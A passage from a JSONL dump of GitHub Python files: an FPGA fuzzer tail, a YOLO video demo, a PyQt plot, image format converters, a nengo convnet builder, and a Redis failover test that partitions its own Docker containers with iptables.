\"MIDDRXN_MODDRXN\"]\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODE\".format(prim), modes,\n lambda x: get_substs(x, default_cfg=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.GSR\".format(prim), [\"ENABLED\", \"DISABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"GSR\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.SRMODE\".format(prim), [\"ASYNC\", \"LSR_OVER_CE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"SRMODE\", x), glb=True), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRXN.DDRMODE\".format(prim), [\"NONE\", \"IDDRX2\", \"IDDR71\", \"IDDRX4\", \"IDDRX5\"],\n lambda x: get_substs(mode=\"IDDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.ODDRXN.DDRMODE\".format(prim), [\"NONE\", \"ODDRX2\", \"ODDR71\", \"ODDRX4\", \"ODDRX5\"],\n lambda x: get_substs(mode=\"ODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x)), False)\n\n for sig in (\"SCLKIN\", \"SCLKOUT\", \"CEIN\", \"CEOUT\", \"LSRIN\", \"LSROUT\"):\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.{}MUX\".format(prim, sig), [\"1\" if sig[0:2] == \"CE\" else \"0\", sig, \"INV\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"{}MUX\".format(sig), x), mux=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.OUTPUT\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".DOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"TOUTMUX\", \"TSREG\"), glb=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n else:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IDDRX1_ODDRX1.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IDDRX1_ODDRX1\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.IREG_OREG.TRISTATE\".format(prim), [\"DISABLED\", \"ENABLED\"],\n lambda x: get_substs(mode=\"IREG_OREG\", default_cfg=True, pinconn=(\".TOUT(sig), .LSRIN(sig)\" if x == \"ENABLED\" else \"\")), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"INMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTMUX\".format(prim), [\"BYPASS\", \"DELAY\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"OUTMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DELAYMUX\".format(prim), [\"OUT_REG\", \"IN\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DELAYMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MOVEMUX\".format(prim), [\"0\", \"MOVE\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"MOVEMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.DIRMUX\".format(prim), [\"0\", \"DIR\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"DIRMUX\", x), glb=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.LOAD_NMUX\".format(prim), [\"1\", \"LOAD_N\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"LOAD_NMUX\", x), glb=True), False)\n\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.INREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"INREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.OUTREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"OUTREG\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.TSREG.REGSET\".format(prim), [\"SET\", \"RESET\"],\n lambda x: get_substs(mode=\"IREG_OREG\", kv=(\"REGSET\", x), scope=\"TSREG\"), False)\n if not s:\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MIDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MIDDRX2\", \"MIDDRX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MIDDRXN\"), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MODDRXN.DDRMODE\".format(prim), [\"NONE\", \"MOSHX2\", \"MOSHX4\", \"MODDRX2_DQSW\", \"MODDRX4_DQSW\", \"MODDRX2_DQSW270\", \"MODDRX4_DQSW270\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x), scope=\"MODDRXN\", dqs=True), False)\n nonrouting.fuzz_enum_setting(cfg, empty, \"{}.MTDDRXN.DDRMODE\".format(prim), [\"NONE\", \"MTSHX2\", \"MTSHX4\"],\n lambda x: get_substs(mode=\"MIDDRXN_MODDRXN\", kv=(\"DDRMODE\", \"#OFF\" if x == \"NONE\" else x + \" TOUTMUX:MTDDR\"), scope=\"MTDDRXN\"), False)\n fuzzloops.parallel_foreach(configs, per_config)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gatecat/prjoxide","sub_path":"fuzzers/LIFCL/070-iologic_mode/fuzzer.py","file_name":"fuzzer.py","file_ext":"py","file_size_in_byte":16036,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"18"}
+{"seq_id":"72326089639","text":"# 引入cv2用于视频处理\nimport cv2\n# 引入YOLO模型用于目标检测\nfrom ultralytics import YOLO\n\n# 加载YOLO模型,进行目标检测\nmodel = YOLO('../weights/yolov8n-seg.pt')\n\n# 打开视频文件,这里的路径需要自行替换\nvideo_path = \"../assets/people_walking_1.mp4\"\ncap = cv2.VideoCapture(video_path)\n\n# 循环读取视频帧\nwhile cap.isOpened():\n # 读取一帧图像\n success, frame = cap.read()\n\n if not success:\n print(\"没有内容,退出啦 :) \")\n break\n\n if success:\n # 对读取的帧进行目标检测\n results = model(frame)\n\n # 可视化检测结果,这里设置置信度阈值为0.5,不显示框,显示掩码和概率\n annotated_frame = results[0].plot(conf=0.5, boxes=False, masks=True, probs=True)\n\n # 显示标注后的帧\n cv2.imshow(\"YOLOv8 Inference\", annotated_frame)\n\n # 如果按下“q”键,跳出循环\n # if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n # break\n if cv2.waitKey(24) == ord('q'): # 改为24ms,如果是1ms,则播放速度过快。\n break\n\n else:\n # 如果视频结束,跳出循环\n break\n\n# 释放视频捕捉对象,并关闭所有窗口\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"LiuEhe/YOLO_detect","sub_path":"demo/yolov8_smaple.py","file_name":"yolov8_smaple.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"14073227617","text":"from PyQt5 import QtWidgets, QtCore\nfrom pyqtgraph import PlotWidget, plot\nimport pyqtgraph as pg\nimport sys # We need sys so that we can pass argv to QApplication\nimport os\nfrom random import randint\n\nclass MainWindow(QtWidgets.QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n self.init_status_figure()\n self.update_status_figure()\n \n def init_status_figure(self):\n\n \n self.graphWidget = pg.PlotWidget()\n self.setCentralWidget(self.graphWidget)\n\n self.status_x = list(range(100)) # 100 time points\n self.status_y = [randint(0,100) for _ in range(100)] # 100 data points\n\n self.graphWidget.setBackground('w')\n\n pen = pg.mkPen(color=(255, 0, 0))\n self.data_line = self.graphWidget.plot(self.status_x, self.status_y, pen=pen)\n #\n # def status_fig_window(self):\n # trendGroupBox = QGroupBox(\"\") \n # childWindow.setObjectName(\"\")\n # childWindow.setWindowTitle(\"Online data monitoring for ADC channel %s\" % str(subindex))\n # childWindow.resize(600, 300) # w*h\n # logframe = QFrame()\n # logframe.setLineWidth(0.6)\n # childWindow.setCentralWidget(logframe)\n # self.trendLayout = QGridLayout()\n # Fig = self.graphWidget\n # self.trendLayout.addWidget(Fig, 0, 0)\n # trendGroupBox.setLayout(self.trendLayout)\n # logframe.setLayout(self.trendLayout) \n \n def update_status_figure(self): \n self.timer = QtCore.QTimer()\n self.timer.setInterval(50)\n self.timer.timeout.connect(self.update_communication_status)\n self.timer.start()\n \n def update_communication_status(self):\n\n self.status_x = self.status_x[1:] # Remove the first y element.\n self.status_x.append(self.status_x[-1] + 1) # Add a new value 1 higher than the last.\n\n self.status_y = self.status_y[1:] # Remove the first\n self.status_y.append( randint(0,100)) # Add a new random value.\n\n self.data_line.setData(self.status_x, self.status_y) # Update the data.\n \napp = QtWidgets.QApplication(sys.argv)\nw = MainWindow()\nw.show()\nsys.exit(app.exec_())","repo_name":"ahmedqamesh/mopshub-sw-kcu102","sub_path":"test_files/pygraph.py","file_name":"pygraph.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"22468099476","text":"import argparse\nfrom collections import defaultdict\nfrom enum import Enum\nimport os\nfrom typing import cast, Dict, Optional, Sequence, Tuple\nfrom typing_extensions import Buffer\n\nimport numpy as np\nimport PIL\n\nfrom calliope.models import ImageFormat\nfrom calliope.tables import Image\nfrom calliope.utils.file import get_file_extension\n\n\ndef guess_image_format_from_filename(filename: str) -> ImageFormat:\n extension = get_file_extension(filename)\n if extension in (\"raw\", \"rgb565\"):\n return ImageFormat.RGB565\n if extension in (\"grayscale16\"):\n return ImageFormat.GRAYSCALE16\n elif extension in (\"jpg\", \"jpeg\"):\n return ImageFormat.JPEG\n elif extension == \"png\":\n return ImageFormat.PNG\n else:\n raise ValueError(f\"Unrecognized image format for {filename}\")\n\n\ndef image_format_to_media_type(image_format: ImageFormat) -> str:\n return image_format.value\n\n\n# For a good discussion of the RGB565 format,\n# see: http://www.barth-dev.de/online/rgb565-color-picker/#\n\n# The below conversion code was inspired by https://github.com/CommanderRedYT\n\n\ndef convert_png_to_rgb565(input_filename: str, output_filename: str) -> Image:\n \"\"\"\n Converts the given PNG file to RGB565/raw format.\n \"\"\"\n png = PIL.Image.open(input_filename)\n\n input_image_content = png.getdata()\n output_image_content = np.empty(len(input_image_content), np.uint16)\n for i, pixel in enumerate(input_image_content):\n r = (pixel[0] >> 3) & 0x1F\n g = (pixel[1] >> 2) & 0x3F\n b = (pixel[2] >> 3) & 0x1F\n rgb = r << 11 | g << 5 | b\n output_image_content[i] = rgb\n\n with open(output_filename, \"wb\") as output_file:\n output_file.write(cast(Buffer, output_image_content))\n\n return Image(\n width=png.width,\n height=png.height,\n format=ImageFormat.RGB565.value,\n url=output_filename,\n )\n\n\ndef convert_rgb565_to_png(\n input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n \"\"\"\n Converts the given RGB565/raw file to PNG format.\n \"\"\"\n with open(input_filename, \"r\") as input_file:\n dataArray = np.fromfile(input_file, np.uint16)\n\n png = PIL.Image.new(\"RGB\", (width, height))\n\n for i, word in enumerate(np.nditer(dataArray)):\n r = (word >> 11) & 0x1F # type: ignore[operator]\n g = (word >> 5) & 0x3F # type: ignore[operator]\n b = word & 0x1F # type: ignore[operator]\n png.putpixel((i % width, i // width), (r << 3, g << 2, b << 3))\n\n png.save(output_filename)\n\n return Image(\n width=width,\n height=height,\n format=ImageFormat.PNG.value,\n url=output_filename,\n )\n\n\ndef convert_png_to_grayscale16(input_filename: str, output_filename: str) -> Image:\n \"\"\"\n Converts the given PNG file to 'grayscale-16' format.\n There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n \"\"\"\n\n png = PIL.Image.open(input_filename)\n # Convert to grayscale.\n png = png.convert(mode=\"L\")\n\n input_image_content = png.getdata()\n output_image_content = np.empty(int(len(input_image_content) / 2), np.uint8)\n i = 0\n for y in range(0, png.size[1]):\n byte = 0\n done = True\n for x in range(0, png.size[0]):\n l = png.getpixel((x, y))\n if x % 2 == 0:\n byte = l >> 4\n done = False\n else:\n byte |= l & 0xF0\n output_image_content[i] = byte\n done = True\n i += 1\n if not done:\n output_image_content[i] = byte\n\n with open(output_filename, \"wb\") as output_file:\n output_file.write(cast(Buffer, output_image_content))\n\n return Image(\n width=png.width,\n height=png.height,\n format=ImageFormat.GRAYSCALE16.value,\n url=output_filename,\n )\n\n\ndef convert_grayscale16_to_png(\n input_filename: str, output_filename: str, width: int, height: int\n) -> Image:\n \"\"\"\n Converts 'grayscale-16' file to PNG.\n There are 2 pixels per byte, 4 bits (black, white, 14 shades of gray) each.\n \"\"\"\n\n with open(input_filename, \"r\") as input_file:\n dataArray = np.fromfile(input_file, np.uint8)\n\n png = PIL.Image.new(\"L\", (width, height))\n\n for i, pixel_pair in enumerate(np.nditer(dataArray)):\n p0 = int(pixel_pair & 0xF) << 4 # type: ignore[operator]\n i *= 2\n x = i % width\n y = i // width\n if y >= height:\n # Due to an earlier bug, some stored images have too much data.\n break\n png.putpixel((x, y), p0)\n\n p1 = int(pixel_pair) # type: ignore[call-overload]\n i += 1\n x = i % width\n y = i // width\n if y >= height:\n # Due to an earlier bug, some stored images have too much data.\n break\n png.putpixel((x, y), p1)\n\n png.save(output_filename)\n\n return Image(\n width=width,\n height=height,\n format=ImageFormat.PNG.value,\n url=output_filename,\n )\n\n\ndef convert_pil_image_to_png(image_filename: str) -> str:\n \"\"\"\n Converts a standard image file (one understood by\n the PIL library) to PNG format, if it isn't already, in\n a new file with the .png extension.\n\n Note that this won't work with the specialized grayscale\n and RGB565 formats that Calliope provides for Sparrow hardware,\n as PIL doesn't support these.\n\n Args:\n image_filename: the filename of an image.\n\n Returns:\n the filename of the new or existing PNG file.\n \"\"\"\n extension = get_file_extension(image_filename)\n if extension != \"png\":\n image_filename_png = image_filename + \".png\"\n img = PIL.Image.open(image_filename)\n img.save(image_filename_png)\n image_filename = image_filename_png\n\n return image_filename\n\n\ndef resize_image_if_needed(\n input_image: Image,\n output_image_width: Optional[int],\n output_image_height: Optional[int],\n output_filename: str,\n) -> Optional[Image]:\n \"\"\"\n Resizes a given image iff necessary given output_image_width and\n output_image_height.\n \"\"\"\n resized_image = None\n\n if output_image_width and output_image_height:\n img = PIL.Image.open(input_image.url)\n if img.width != output_image_width or img.height != output_image_height:\n # Fit the image into the bounding box given by (output_image_width,\n # output_image_height)...\n scaling_factor = min(\n output_image_width / img.width, output_image_height / img.height\n )\n resized_width = int(scaling_factor * img.width)\n resized_height = int(scaling_factor * img.height)\n scaled_image_size = (resized_width, resized_height)\n img = img.resize(scaled_image_size)\n\n output_image_size = (output_image_width, output_image_height)\n if output_image_size != scaled_image_size:\n # If the scaled image doesn't match the requested image size,\n # add black bars to either side of it...\n new_image = PIL.Image.new(\n \"RGB\", output_image_size\n ) # A blank image, all black.\n box = (\n (output_image_width - resized_width) // 2,\n (output_image_height - resized_height) // 2,\n )\n\n # Paste the scaled image into the middle of the black image.\n new_image.paste(img, box)\n new_image.save(output_filename)\n resized_width = output_image_width\n resized_height = output_image_height\n else:\n # Otherwise, just save the resized image.\n img.save(output_filename)\n\n resized_image = Image(\n width=resized_width,\n height=resized_height,\n format=input_image.format,\n url=output_filename,\n )\n\n return resized_image\n\n\ndef get_image_attributes(image_filename: str) -> Image:\n \"\"\"\n Gets an Image from an image filename.\n \"\"\"\n image = PIL.Image.open(image_filename)\n format = guess_image_format_from_filename(image_filename)\n\n return Image(\n width=image.width,\n height=image.height,\n format=format.value,\n url=image_filename,\n )\n\n\ndef get_image_colors(image_filename: str) -> Sequence[Tuple[int, int]]:\n \"\"\"\n Returns a sequence of (count, color) tuples with colors given in the mode of the image (e.g. RGB).\n \"\"\"\n image = PIL.Image.open(image_filename)\n by_color: Dict[int, int] = defaultdict(int)\n for pixel in image.getdata():\n by_color[pixel] += 1\n return cast(Sequence[Tuple[int, int]], list(by_color.items()))\n\n\ndef image_is_monochrome(image_filename: str) -> bool:\n \"\"\"\n Returns True iff the given image is of a single solid d\n \"\"\"\n colors = get_image_colors(image_filename)\n return colors is not None and len(colors) == 0\n\n\nclass Mode(Enum):\n RAW = \".raw\"\n PNG = \".png\"\n\n\ndef main() -> None:\n \"\"\"\n A little utility test harness for conversion to/from the rgb565 format.\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"Convert a file from one format to another.\"\n )\n parser.add_argument(\n \"-i\",\n \"--input\",\n required=True,\n dest=\"input_file\",\n help=\"Input file to be converted.\",\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n nargs=\"?\",\n dest=\"output_file\",\n help=\"Output file to be converted.\",\n )\n parser.add_argument(\n \"--width\",\n dest=\"width\",\n help=\"The image width in pixels.\",\n )\n parser.add_argument(\n \"--height\",\n dest=\"height\",\n help=\"The image height in pixels.\",\n )\n args = parser.parse_args()\n input_filename = args.input_file\n output_filename = args.output_file\n width = int(args.width) if args.width else 0\n height = int(args.height) if args.height else 0\n\n input_basename = os.path.basename(input_filename).rsplit(\".\", 1)\n\n mode = Mode.RAW if (input_basename[1] == \"png\") else Mode.PNG\n\n if output_filename is None:\n output_filename = input_basename[0] + mode.value\n\n output_basename = os.path.basename(output_filename).rsplit(\".\", 1)\n\n if len(output_basename) != 2:\n print(\"Error: Invalid arguments.\")\n exit(1)\n\n if input_basename[1] not in [\"png\", \"raw\"]:\n print(\"Error: Input file must be a .png or .raw file.\")\n exit(1)\n\n if output_basename[1] not in [\"png\", \"raw\"]:\n print(\"Error: Output file must be a .png or .raw file.\")\n print(f\"Output file: {output_basename}\")\n exit(1)\n\n if input_basename[1] == output_basename[1]:\n print(\"Error: Input and output file must be different.\")\n exit(1)\n\n if mode == Mode.PNG:\n convert_rgb565_to_png(input_filename, output_filename, width, height)\n else:\n convert_png_to_rgb565(input_filename, output_filename)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"chrisimmel/calliope","sub_path":"calliope/utils/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":11270,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
+{"seq_id":"26585854633","text":"import nengo\nimport nengo_dl\nimport numpy as np\n\n\nclass ConvNet(object):\n def __init__(self, net, max_rate=100):\n amp = 1 / max_rate\n net.config[nengo.Ensemble].neuron_type = nengo.RectifiedLinear(amplitude=amp)\n net.config[nengo.Ensemble].max_rates = nengo.dists.Choice([max_rate])\n net.config[nengo.Ensemble].intercepts = nengo.dists.Choice([0])\n net.config[nengo.Connection].synapse = None \n self.net = net\n self.layers = []\n self.output_shapes = []\n self.input = None\n \n def make_input_layer(self, source_shape,\n spatial_stride=(1, 1),\n spatial_size=None,\n use_separate_nodes=False,\n index_map=None): \n if spatial_size is None:\n spatial_size = (source_shape[2], source_shape[1])\n\n with self.net:\n if self.input is None:\n self.input = nengo.Node(\n None,\n size_in=source_shape[0]*source_shape[1]*source_shape[2],\n label='input')\n\n j = 0\n w = spatial_size[0]\n h = spatial_size[1]\n if index_map is not None:\n items = index_map\n else:\n items = np.arange(source_shape[1]*source_shape[2])\n\n items.shape = source_shape[1:]\n layer = []\n while j + h <= source_shape[1]:\n row = []\n i = 0\n while i + w <= source_shape[2]:\n if use_separate_nodes:\n sp = nengo.Node(None, size_in=w*h*source_shape[0],\n label='[%d:%d,%d:%d]' % (j,j+h,i,i+w))\n row.append([sp]) \n\n indices = np.array((items[j:j+h][:,i:i+w]).flat)\n all_indices = []\n for q in range(source_shape[0]):\n all_indices.extend(indices+q*source_shape[1]*source_shape[2])\n \n if use_separate_nodes:\n nengo.Connection(self.input[all_indices], sp)\n else:\n row.append([self.input[all_indices]])\n\n i += spatial_stride[0]\n j += spatial_stride[1]\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append((source_shape[0],\n spatial_size[0],\n spatial_size[1]))\n \n def make_middle_layer(self, n_features, n_parallel,\n n_local, kernel_stride, kernel_size, padding='valid',\n use_neurons=True, init=nengo.dists.Uniform(-1,1)):\n with self.net:\n prev_layer = self.layers[-1]\n prev_output_shape = self.output_shapes[-1]\n layer = []\n for prev_row in prev_layer:\n row = []\n for prev_col in prev_row:\n col = []\n this_index = 0\n \n index = 0\n for k in range(n_parallel):\n prev_index = 0\n if isinstance(init, nengo.dists.Distribution):\n this_inits = [init] * n_local\n else:\n this_inits = []\n prev_size = init.shape[2] // n_local\n\n for i in range(n_local):\n\n this_init = init[:,:,prev_index:prev_index+prev_size,\n this_index:this_index+n_features]\n prev_index = (prev_index + prev_size)\n this_inits.append(this_init)\n this_index = (this_index + n_features)\n\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[0])\n if use_neurons:\n ens = nengo.Ensemble(conv.output_shape.size, dimensions=1,\n label='%s' % conv.output_shape)\n ens_neurons = ens.neurons\n else:\n ens = nengo.Node(None, size_in=conv.output_shape.size,\n label='%s' % conv.output_shape)\n ens_neurons = ens\n for kk in range(n_local):\n prev_k = prev_col[index%len(prev_col)]\n conv = nengo.Convolution(n_features, prev_output_shape,\n channels_last=False,\n kernel_size=kernel_size,\n padding=padding,\n strides=kernel_stride,\n init=this_inits[kk])\n nengo.Connection(prev_k, ens_neurons, transform=conv)\n index += 1\n col.append(ens_neurons)\n row.append(col)\n layer.append(row)\n self.layers.append(layer)\n self.output_shapes.append(conv.output_shape)\n \n def make_output_layer(self, dimensions):\n with self.net:\n self.output = nengo.Node(None, dimensions, label='output')\n for row in self.layers[-1]:\n for col in row:\n for k in col:\n nengo.Connection(k, self.output,\n transform=nengo_dl.dists.Glorot())\n \n def make_merged_output(self, shape):\n with self.net:\n self.output = nengo.Node(None, size_in=shape[0]*shape[1], label='output')\n indices = np.arange(shape[0]*shape[1]).reshape(shape)\n\n count = np.zeros(self.output.size_out)\n\n patch_shape = self.output_shapes[-1].shape\n assert patch_shape[0] == 1\n i = 0\n j = 0\n for row in self.layers[-1]:\n for n in row:\n assert len(n) == 1\n n = n[0]\n items = indices[j:j+patch_shape[2],i:i+patch_shape[1]]\n nengo.Connection(n, self.output[items.flatten()])\n count[items.flatten()] += 1\n i += patch_shape[1]\n j += patch_shape[2]\n i = 0\n assert count.min() == count.max() == 1\n\n","repo_name":"tcstewar/davis_tracking","sub_path":"davis_tracking/spatial_convnet.py","file_name":"spatial_convnet.py","file_ext":"py","file_size_in_byte":7101,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"39"}
+{"seq_id":"13192126746","text":"\"\"\"\nA simple demo for closer\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport time\n\nimport docker\nimport redis\nimport redis.asyncio as async_redis\n\n\nclass Runner:\n def __init__(self, stop_closer=False):\n self.docker_client = docker.from_env()\n self.containers = self.discover_containers()\n self.tasks = {}\n self._should_stop_closer = stop_closer\n self.log = logging.getLogger(__name__)\n self.counter = 1\n self.recorded = set()\n\n async def run_load(self, target):\n \"\"\"\n Run test load against target\n \"\"\"\n while True:\n try:\n conn = async_redis.Redis(host=target, socket_timeout=0.1)\n await conn.ping()\n # Actually we are running in single thread here\n # So no locks/atomics are required\n value = self.counter\n self.counter += 1\n await conn.set(f'{value}', '1')\n self.recorded.add(f'{value}'.encode('utf-8'))\n except asyncio.CancelledError:\n return\n except Exception as exc:\n self.log.debug('Inserting for %s failed: %r', target, exc)\n await asyncio.sleep(0.1)\n\n def discover_containers(self):\n \"\"\"\n Get a map of name -> docker container\n \"\"\"\n res = {}\n for container in self.docker_client.containers.list():\n if container.labels.get('com.docker.compose.project') == 'poor-man-redis-closer':\n service = container.labels['com.docker.compose.service']\n if 'host' not in service:\n continue\n res[service] = container\n return res\n\n def stop_closer(self):\n \"\"\"\n Stop closer in containers\n \"\"\"\n for name, container in self.containers.items():\n res = container.exec_run('supervisorctl stop closer')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to stop closer in {name}: {res.output}')\n\n def wait_redis(self):\n \"\"\"\n Wait for host1 to become primary with 2 replicas\n \"\"\"\n timeout = 60\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n ready = True\n conn = redis.Redis(host='host1')\n info = conn.info('replication')\n if info['connected_slaves'] != 2:\n ready = False\n for host in ['host2', 'host3']:\n replica_conn = redis.Redis(host=host)\n info = replica_conn.info('replication')\n if info['master_link_status'] != 'up':\n ready = False\n sentinel_conn = redis.Redis(host=host, port=26379)\n replicas = sentinel_conn.sentinel_slaves('demo')\n if len(replicas) != 2:\n ready = False\n sentinel_conn = redis.Redis(host='host2', port=26379)\n status = sentinel_conn.sentinel_sentinels('demo')\n if len(status) != 2:\n ready = False\n if ready:\n return\n except Exception as exc:\n self.log.warning('Waiting for redis to become ready: %r', exc)\n time.sleep(1)\n raise RuntimeError('host1 is not ready')\n\n def wait_single_primary(self):\n \"\"\"\n Wait for single primary with 2 replicas\n \"\"\"\n timeout = 180\n deadline = time.time() + timeout\n while time.time() < deadline:\n try:\n primaries = []\n for name in self.containers:\n conn = redis.Redis(host=name, socket_timeout=0.1)\n info = conn.info('replication')\n if info['role'] == 'master':\n primaries.append(name)\n if len(primaries) == 1:\n return primaries[0]\n self.log.info('Waiting for single primary. Primaries: %s', ', '.join(primaries))\n except Exception as exc:\n self.log.debug('Waiting for single primary: %r', exc)\n time.sleep(1)\n raise RuntimeError('No single primary after network healing')\n\n def isolate(self, target):\n \"\"\"\n Isolate container from other hosts\n \"\"\"\n target_container = self.containers[target]\n addr = target_container.attrs['NetworkSettings']['Networks']['poor-man-redis-closer_default']['IPAddress']\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run(f'iptables -t filter -I INPUT -s {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {name} from {target}')\n res = container.exec_run(f'iptables -t filter -I OUTPUT -d {addr} -j DROP')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to close {target} from {name}')\n\n def open(self, target):\n \"\"\"\n Open container for other hosts\n \"\"\"\n for name, container in self.containers.items():\n if name != target:\n res = container.exec_run('iptables -t filter -F INPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {name} for {target}')\n res = container.exec_run('iptables -t filter -F OUTPUT')\n if res.exit_code != 0:\n raise RuntimeError(f'Unable to open {target} for {name}')\n\n def count_lost(self, primary):\n \"\"\"\n Count lost record\n \"\"\"\n conn = redis.Redis(host=primary)\n on_primary = set(conn.keys())\n lost = self.recorded.difference(on_primary)\n print(f'Lost keys {len(lost)}/{len(self.recorded)}')\n\n async def load(self):\n \"\"\"\n Async part of run\n \"\"\"\n for host in self.containers:\n self.tasks[host] = asyncio.create_task(self.run_load(host))\n print('Isolating host1')\n self.isolate('host1')\n print('Waiting for 10 minutes')\n await asyncio.sleep(600)\n for task in self.tasks.values():\n task.cancel()\n\n def run(self):\n \"\"\"\n Run demo\n \"\"\"\n self.wait_redis()\n if self._should_stop_closer:\n self.stop_closer()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(self.load())\n self.open('host1')\n print('Waiting for single primary after network heal')\n primary = self.wait_single_primary()\n self.count_lost(primary)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--no-closer', action='store_true', help='Stop closer before running load')\n args = parser.parse_args()\n runner = Runner(args.no_closer)\n runner.run()\n","repo_name":"secwall/poor-man-redis-closer","sub_path":"demo/runner/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
